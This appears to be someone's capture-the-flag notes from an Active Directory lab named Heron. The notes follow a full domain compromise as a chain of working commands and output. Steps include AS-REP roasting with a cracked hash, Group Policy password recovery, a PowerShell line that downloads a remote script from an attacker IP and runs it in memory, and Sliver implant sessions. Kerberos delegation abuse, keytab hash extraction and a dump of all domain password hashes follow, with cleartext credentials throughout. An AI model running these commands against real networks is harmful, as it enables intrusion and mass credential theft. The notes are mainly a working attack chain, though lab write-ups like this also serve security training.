This is an assumed breach scenario. Heron Corp created a low-privileged local user account on a jump server for you.


pentest:Heron123!

10.10.249.133 mucdc.heron.vl heron.vl mucdc 10.10.249.134 frajmp.heron.vl

ssh pentest@frajmp.heron.vl
wget http://10.8.2.41/Apparent_judgment
use session_name
socks5 start
  • access web page on the domain controller
  • found three new users.

wayne.wood@heron.vl julina.pratt@heron.vl samuel.davies@heron.vl svc-web-accounting-d@heron.vl svc-web-accounting@heron.vl

Try AS-REP roasting

proxychains -f /etc/proxychains4.conf impacket-GetNPUsers heron.vl/ -dc-host mucdc.heron.vl -usersfile users.txt

$krb5asrep$23$samuel.davies@heron.vl@HERON.VL:0b433ed62ad92e5b7b43f497d11bff85$39919ebacd4a46ff661aa8ec14255c2ead773d285a3817cf90514dcd8aadfd796b9c179e4952a1ab9fc3475f58891d9d79df736abc6e362e817611ec1915235f399dea251ae72c17d2320f1b0d723551223ea68dee403d227261f51a79b124d46c7f3250e566c7668aad59714fa2df73ae9b57b0415e4d5f32604690dde65f59fcb100fe7de1ea844a35f2f7ea3600971058af3d768a9f94bd9baa312c00fbaec724418e2d8e2343a3f7b900c47dff8559945e4c3bbaa18c8db7fcba6940b1bd6bd63620086da4b035cb564dcac54fe3910089d45a62b0286da791e1c49440c76ea7a002

samuel.davies
l6fkiy9oN
impacket-getTGT heron.vl/samuel.davies:l6fkiy9oN
nxc ldap mucdc.heron.vl --use-kcache -M adcs

 Found PKI Enrollment Server: mucdc.heron.vl
ADCS        10.10.198.181   389    MUCDC            Found CN: heron-CA

User:                     Description:
_admin                    Built-in account for administering the computer/domain
Guest                     Built-in account for guest access to the computer/domain
krbtgt                    Key Distribution Center Service Account
Katherine.Howard          T0 Windows Admin
Julian.Pratt              T1 Linux Admin
Samuel.Davies             Leaves Company 06/24
adm_hoka                  t0
adm_prju                  t1

ffuf -w /snap/seclists/current/Discovery/DNS/subdomains-top1million-110000.txt -u http://heron.vl/ -H 'Host: FUZZ.heron.vl'    -fl 87
_PASS... 10.10.198.181   445    MUCDC            Password: H3r0n2024#!
GPP_PASS... 10.10.198.181   445    MUCDC            action: U
GPP_PASS... 10.10.198.181   445    MUCDC            newName: _local
GPP_PASS... 10.10.198.181   445    MUCDC            fullName:
GPP_PASS... 10.10.198.181   445    MUCDC            description: local administrator
GPP_PASS... 10.10.198.181   445    MUCDC            changeLogon: 0
GPP_PASS... 10.10.198.181   445    MUCDC            noChange: 0
GPP_PASS... 10.10.198.181   445    MUCDC            neverExpires: 1
GPP_PASS... 10.10.198.181   445    MUCDC            acctDisabled: 0
GPP_PASS... 10.10.198.181   445    MUCDC            subAuthority: RID_ADMIN

(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX

sliver (FLAT_WEEDKILLER) > ls

C:\ (19 items, 1.1 GiB)
=======================
drwxrwxrwx  $Recycle.Bin                        <dir>     Thu Jun 06 08:01:47 -0700 2024
drwxrwxrwx  $WinREAgent                         <dir>     Sat Jun 01 07:31:05 -0700 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B       Sat May 25 19:07:58 -0700 2024
-rw-rw-rw-  DumpStack.log.tmp                   12.0 KiB  Sun Jun 16 19:25:49 -0700 2024
-rw-rw-rw-  flag.txt                            36 B      Sun Jun 02 03:45:42 -0700 2024
drwxrwxrwx  home                                <dir>     Sat Jun 01 08:10:46 -0700 2024
drwxrwxrwx  inetpub                             <dir>     Sun May 26 02:31:27 -0700 2024
drwxrwxrwx  it                                  <dir>     Thu Jun 06 07:22:22 -0700 2024
-rw-rw-rw-  pagefile.sys                        1.1 GiB   Sun Jun 16 19:25:49 -0700 2024
drwxrwxrwx  PerfLogs                            <dir>     Sat May 08 01:20:24 -0700 2021
dr-xr-xr-x  Program Files                       <dir>     Thu Jun 06 07:22:51 -0700 2024
drwxrwxrwx  Program Files (x86)                 <dir>     Sat Jun 01 07:30:43 -0700 2024
drwxrwxrwx  ProgramData                         <dir>     Sun Jun 02 08:24:36 -0700 2024
drwxrwxrwx  Recovery                            <dir>     Sat May 25 19:07:59 -0700 2024
drwxrwxrwx  System Volume Information           <dir>     Sun May 26 02:48:42 -0700 2024
drwxrwxrwx  transfer                            <dir>     Sun May 26 04:51:27 -0700 2024
dr-xr-xr-x  Users                               <dir>     Sat Jun 01 08:43:04 -0700 2024
drwxrwxrwx  webaccounting                       <dir>     Sun Jun 16 20:07:37 -0700 2024
drwxrwxrwx  Windows                             <dir>     Sun Jun 02 08:26:03 -0700 2024


sliver (FLAT_WEEDKILLER) > cat flag.txt

VL{8f0f33fd2d2bad2152564ae5306daf70}

GETTING TGT

rubeus tgtdeleg /service:krbtgt /nowrap
../../tools/RubeusToCcache/rubeustoccache.py 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 svc-web-accounting.kirbi svc-web-accounting.ccache

export KRB5CCNAME=svc-web-accounting.ccache
 nxc smb mucdc.heron.vl -u svc-web-accounting --use-kcache

SSH login AD

Krb5.conf

[libdefaults]
udp_preference_limit = 0
default_realm = HERON.VL
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 72h
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false


[realms]
    HERON.VL = {
        kdc = mucdc.heron.vl
        admin_server = mucdc.heron.vl
    }

[domain_realm]
    .heron.vl = HERON.VL
    heron.vl = HERON.VL

kvno host/frajmp.HERON.VL

sudo apt-get install krb5-user libpam-krb5 libpam-ccreds auth-client-config
ssh -K svc-web-accounting@HERON.VL@frajmp.HERON.VL
ssh _local@frajmp.HERON.VL

sliver (EMOTIONAL_GERANIUM) > cat ssh.ps1

# ssh.ps1 as recovered from the host: wraps plink.exe to run a fixed set of
# commands on the jump host over SSH, authenticating with a cleartext password.
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
# NOTE(review): credential is embedded in the script in cleartext. Anyone who can
# read this file (or the process command line, since -pw places it in argv) obtains
# the password; this is the exposure that hands over the _local account. Mitigate
# with key-based auth (pageant/agent or a restricted key file) and tight ACLs on
# the script, and rotate the credential once it has been stored this way.
$password = "Deplete5DenialDealt"
# -batch disables interactive prompts (including host-key confirmation), so a
# changed host key would not be flagged to the operator.
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"

VL{5112c412c73712e84fc3d01a30298760}

adm_pruj@heron.vl ayDMWV929N9wAiB4

Found via julian.pratt, who had the same password as _local.

Resource-Based Constrained Delegation

rbcd.py -delegate-from FRAJMP$ -delegate-to MUCDC$ -action 'write' 'heron.vl/adm_prju'

➜  backup ../../../tools/KeytabParser/KeyTabExtract/keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HERON.VL
        SERVICE PRINCIPAL : FRAJMP$/
        NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
        AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
        AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd

 getST.py -spn 'cifs/mucdc.heron.vl' -impersonate '_Admin' 'heron.vl/frajmp$' -hashes 6f55b3b443ef192c804b2ae98e8254f7:6f55b3b443ef192c804b2ae98e8254f7

export KRB5CCNAME=_Admin.ccache
 nxc smb mucdc.heron.vl -u _admin --use-kcache -M ntds.dit
 _admin:500:aad3b435b51404eeaad3b435b51404ee:3998cdd28f164fa95983caf1ec603938:::
NTDSUTIL    10.10.181.69    445    MUCDC            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    10.10.181.69    445    MUCDC            MUCDC$:1000:aad3b435b51404eeaad3b435b51404ee:9fce94a1965bf784e836b19fa35ead2f:::
NTDSUTIL    10.10.181.69    445    MUCDC            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:6548c4cf2aac7a7d1b02d62b2e1a03d2:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Rachael.Boyle:24576:aad3b435b51404eeaad3b435b51404ee:9dbe3e4834072d582e8d93c892348e6a:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Anthony.Goodwin:24577:aad3b435b51404eeaad3b435b51404ee:b87a22f9ae78745edaf7070389e10bac:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Carol.John:24578:aad3b435b51404eeaad3b435b51404ee:46b1a4375e32c380a6dcf38a8bb7fb74:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Rosie.Evans:24579:aad3b435b51404eeaad3b435b51404ee:6e59150f19d36b11c49d060249e908ad:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Adam.Harper:24580:aad3b435b51404eeaad3b435b51404ee:a5468ccbf390bba74aaf5554f3d3555e:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Adam.Matthews:24581:aad3b435b51404eeaad3b435b51404ee:fa460c769bf2327c61e535787476e6a3:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Steven.Thomas:24582:aad3b435b51404eeaad3b435b51404ee:dd635bb1378d97b947b84f40886e9e64:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Amanda.Williams:24583:aad3b435b51404eeaad3b435b51404ee:6d33e1c539d3abe7fbfc15b09f1e94a5:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Vanessa.Anderson:24584:aad3b435b51404eeaad3b435b51404ee:d8b0393689f523f02daa715a9f49083e:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Jane.Richards:24585:aad3b435b51404eeaad3b435b51404ee:550f678b1a5b5bbe263860e4e6136910:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Rhys.George:24586:aad3b435b51404eeaad3b435b51404ee:2718fc2f944887ed9511d934e0249234:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Mohammed.Parry:24587:aad3b435b51404eeaad3b435b51404ee:01e7bba60d0469ea860ee8dfc83f5d80:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Julian.Pratt:24588:aad3b435b51404eeaad3b435b51404ee:5bb0b312fa6a1bd0b89b179e3e6f1288:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Wayne.Wood:24589:aad3b435b51404eeaad3b435b51404ee:7a2320fceec0c816bb48190ec143a2bb:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Danielle.Harrison:24590:aad3b435b51404eeaad3b435b51404ee:558ca476742a54e6f2d469ac4d1abadf:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Samuel.Davies:24591:aad3b435b51404eeaad3b435b51404ee:4a976cc04f49221cf1d950132f84ed2c:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Alice.Hill:24592:aad3b435b51404eeaad3b435b51404ee:c62c0e85ad1e975b14181f65bfff7257:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Jayne.Johnson:24593:aad3b435b51404eeaad3b435b51404ee:273b684425d847c07b05391a9f35f2ef:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\Geraldine.Powell:24594:aad3b435b51404eeaad3b435b51404ee:5003da60cacbbc1ba80df96d7af1e7e8:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\adm_hoka:24595:aad3b435b51404eeaad3b435b51404ee:4bb9e0417af7f8adedd01382f1453b38:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\adm_prju:24596:aad3b435b51404eeaad3b435b51404ee:80ae9e479b40971bc9cac183651dad05:::
NTDSUTIL    10.10.181.69    445    MUCDC            MUCJMP$:24598:aad3b435b51404eeaad3b435b51404ee:ed656b46276f52cb5dae4ecdf0acd26c:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\svc-web-accounting:24602:aad3b435b51404eeaad3b435b51404ee:f9113ad2e51cee72034043daa948d5de:::
NTDSUTIL    10.10.181.69    445    MUCDC            heron.vl\svc-web-accounting-d:26101:aad3b435b51404eeaad3b435b51404ee:bf95ac22b6d87880f9eb3dfdf3d416f9:::
NTDSUTIL    10.10.181.69    445    MUCDC            ACCOUNTING-STAG$:26601:aad3b435b51404eeaad3b435b51404ee:7342a72fc3c418edeb9f98497c3857d4:::
NTDSUTIL    10.10.181.69    445    MUCDC            ACCOUNTING-PREP$:26602:aad3b435b51404eeaad3b435b51404ee:7d9fb2f2bbf68b7d8dd52414bca20540:::
NTDSUTIL    10.10.181.69    445    MUCDC            FRAJMP$:27101:aad3b435b51404eeaad3b435b51404ee:6f55b3b443ef192c804b2ae98e8254f7:::

VL{504bbfae9cade6a9f7c2b74c12ab1a01}

VL{5112c412c73712e84fc3d01a30298760}
VL{8f0f33fd2d2bad2152564ae5306daf70}